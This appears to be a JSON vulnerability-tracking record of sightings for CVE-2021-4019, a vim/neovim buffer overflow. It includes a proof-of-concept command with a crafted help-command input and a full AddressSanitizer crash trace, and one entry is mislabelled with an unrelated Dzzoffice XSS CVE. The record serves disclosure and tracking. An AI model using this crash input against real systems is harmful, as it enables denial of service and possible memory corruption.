{"vulnerability": "CVE-2021-4019", "sightings": [{"uuid": "1ed670dd-30fa-446d-9773-68f7833f8797", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-40191", "type": "seen", "source": "https://t.me/cibsecurity/30346", "content": "\u203c CVE-2021-40191 \u203c\n\nDzzoffice Version 2.02.1 is affected by cross-site scripting (XSS) due to a lack of sanitization of input data at all upload functions in webroot/dzz/attach/Uploader.class.php and return a wrong response in content-type of output data in webroot/dzz/attach/controller.php.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-10-11T18:24:34.000000Z"}, {"uuid": "a0714eaf-f384-4fa1-bfb1-dc5307a84735", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4019", "type": "seen", "source": "https://t.me/cibsecurity/33175", "content": "\u203c CVE-2021-4019 \u203c\n\nvim is vulnerable to Heap-based Buffer Overflow\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2021-12-01T12:35:11.000000Z"}, {"uuid": "b732686c-6ecd-4f94-974d-cda23c310e31", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4019", "type": "seen", "source": "https://gist.github.com/zhuozhenwei/641c89cdfc741fdb3d36909b283c3c00", "content": "Command:\n./nvim-0.6.1 -u NONE -i NONE -n -m -X -V20 -e -s -S CVE-2021-4019_poc -c :qa!\n\n=== OUTPUT ===\nExecuting: augroup nvim_terminal\n\nExecuting: autocmd BufReadCmd term://* ++nested if !exists('b:term_title')|call termopen(matchstr(expand(\"\"), '\\c\\mterm://\\%(.\\{-}//\\%(\\d\\+:\\)\\?\\)\\?\\zs.*'), {'cwd': expand(get(matchlist(expand(\"\"), '\\c\\mterm://\\(.\\{-}\\)//'), 1, ''))})|endif\n\nExecuting: augroup END\n\nExecuting: augroup nvim_cmdwin\n\nExecuting: autocmd! CmdwinEnter [:>] syntax sync minlines=1 maxlines=1\n\nExecuting: augroup END\n\nExecuting: so CVE-2021-4019\n\nline 0: sourcing \"CVE-2021-4019\"\nline 1: h\\%00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\n=================================================================\n==18679==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000001ee0081 at pc 0x0000004c27ce bp 0x7fff222fd650 sp 0x7fff222fce10\nWRITE of size 1023 at 0x000001ee0081 thread T0\n    #0 0x4c27cd in strcpy (/home/zzw/Desktop/nvim_exe/nvim-0.6.1-ASAN+0x4c27cd)\n    #1 0x8bcf36 in find_help_tags /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:5069:7\n    #2 0x8bb08a in ex_help /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds.c:4786:7\n    #3 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n    #4 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n    #5 0x8e8b1c in do_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:2242:5\n    #6 0x8e57f2 in cmd_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1805:14\n    #7 0x8e5dd0 in ex_source /home/zzw/Desktop/neovim/build/../src/nvim/ex_cmds2.c:1786:3\n    #8 0x901cb0 in do_one_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:1983:5\n    #9 0x8f40b2 in do_cmdline /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:604:20\n    #10 0x8f7a53 in do_cmdline_cmd /home/zzw/Desktop/neovim/build/../src/nvim/ex_docmd.c:288:10\n    #11 0xabfaae in exe_commands /home/zzw/Desktop/neovim/build/../src/nvim/main.c:1654:5\n    #12 0xab8096 in main /home/zzw/Desktop/neovim/build/../src/nvim/main.c:493:5\n    #13 0x7f9401cde082 in __libc_start_main /build/glibc-B3wQXB/glibc-2.31/csu/../csu/libc-start.c:308:16\n    #14 0x45df4d in _start (/home/zzw/Desktop/nvim_exe/nvim-0.6.1-ASAN+0x45df4d)\n\n0x000001ee0081 is located 0 bytes to the right of global variable 'IObuff' defined in '../src/nvim/globals.h:670:15' (0x1edfc80) of size 1025\nSUMMARY: AddressSanitizer: global-buffer-overflow (/home/zzw/Desktop/nvim_exe/nvim-0.6.1-ASAN+0x4c27cd) in strcpy\nShadow bytes around the buggy address:\n  0x0000803d3fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n  0x0000803d3fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n  0x0000803d3fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n  0x0000803d3ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n  0x0000803d4000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n=>0x0000803d4010:[01]f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9\n  0x0000803d4020: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9\n  0x0000803d4030: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00\n  0x0000803d4040: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n  0x0000803d4050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n  0x0000803d4060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\nShadow byte legend (one shadow byte represents 8 application bytes):\n  Addressable:           00\n  Partially addressable: 01 02 03 04 05 06 07 \n  Heap left redzone:       fa\n  Freed heap region:       fd\n  Stack left redzone:      f1\n  Stack mid redzone:       f2\n  Stack right redzone:     f3\n  Stack after return:      f5\n  Stack use after scope:   f8\n  Global redzone:          f9\n  Global init order:       f6\n  Poisoned by user:        f7\n  Container overflow:      fc\n  Array cookie:            ac\n  Intra object redzone:    bb\n  ASan internal:           fe\n  Left alloca redzone:     ca\n  Right alloca redzone:    cb\n  Shadow gap:              cc\n==18679==ABORTING\n", "creation_timestamp": "2026-05-29T03:01:29.000000Z"}]}